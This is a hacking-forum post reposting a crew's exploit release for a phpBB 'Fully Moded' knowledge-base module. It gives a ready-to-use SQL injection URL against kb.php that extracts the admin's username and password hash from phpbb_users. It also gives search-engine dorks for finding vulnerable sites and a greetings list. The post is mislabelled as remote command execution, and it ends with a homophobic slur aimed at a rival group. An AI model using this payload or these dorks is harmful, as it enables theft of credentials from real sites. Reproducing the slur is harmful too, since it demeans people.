Jump to content
puskin

phpBB Fully Moded SQL Injection

By puskin, in Exploituri

Recommended Posts

puskin Newbie

puskin

Posted
Posted 


    ----=====[* A CIPHERCREW RELEASE*]=====-----
    ===[FOUND BY BaKo]===



    ########################################

    Script: phpBB Fully Moded

    ########################################

    Type: Remote Command Execution

    ########################################

    Usage:

    http://site.com/path/kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1



    #######################################

    dork: "Modified by Fully Modded"
    inurl:kb.php "all content is copyright" "its original authors"

    #######################################

    Discovered by: BaKo

    #######################################

    Status: reported, released by another noob who got our leaked sploit... but we found it first Wink

    #######################################

    Greetz to:
    xprog, Novalok, dr wh4x, tulle, inspiratio, illuz1on, cam-man-dan, optiplex, Untamed, GM, t0pPg4y, Thedefaced, ~removed~, and everyone else I forgot

    ########################################

    ~censored~:
    all of balcan-crew, those exploit leaking faggots.

    ########################################

credit:h4cky0u.org

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...